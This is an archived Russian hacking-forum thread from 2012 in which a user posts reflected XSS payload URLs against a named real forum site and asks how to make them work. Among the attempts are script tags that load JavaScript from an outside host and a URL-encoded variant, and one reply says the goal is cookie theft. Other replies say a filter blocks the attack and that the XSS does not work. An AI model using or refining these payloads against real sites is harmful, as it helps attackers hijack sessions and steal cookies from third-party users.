PDA

Просмотр полной версии : пасивная xss


muinmyha
26.04.2012, 01:00
Всем привет не могу использовать найденную xss
вот сама пасивка
http://piratia-world.ru/forum/index.php/%F6%22%20onmouseover=prompt">alert('xss')

[url]http://piratia-world.ru/forum/index.php/%F6%22%20onmouseover=prompt%22%3E%3Cscript%3Ealert ('xss')%3C/script%3E

если сделать [url]http://piratia-world.ru/forum/index.php/%F6%22%20onmouseover=prompt%3CSCRIPT type=text/javascript src=http://httpz.ru/160u4vl3pjgo.js>

перекидывает на http://sweb.ru/insecure (https://hpc.name/redirector.html#http://sweb.ru/insecure)
Запрос отвергнут

Запрос небезопасен и был отвергнут.

Если это Ваш сайт — обратитесь в отдел технической поддержки за разъяснениями.

Или может я что не правильно делаю, или это вообще не уязвимость
Помогите, и объясните что не так..

MaCroSs
26.04.2012, 01:00
У них фильтр не пускает вообщем ни на какой сайт,тоесть куки скорее всего украсть ты несможеш

muinmyha
26.04.2012, 01:00
пробывал, не получается, может что не правильно делаю...

[url]http://piratia-world.ru/forum/index.php/%F6%22%20onmouseover=prompt%25%33%43%53%43%52%49%5 0%54%20%74%79%70%65%3D%74%65%78%74%2F%6A%61%76%61% 73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F %2F%68%74%74%70%7A%2E%72%75%2F%31%36%30%75%34%76%6 C%33%70%6A%67%6F%2E%6A%73%3E%3C%2F%53%43%52%49%50% 54%3E

выдает Not Found

The requested URL /forum/index.php/ö" onmouseover=prompt%3CSCRIPT type=text/javascript src=http://httpz.ru/160u4vl3pjgo.js> was not found on this server.

WhiteHacK
26.04.2012, 01:00
XSS не работает.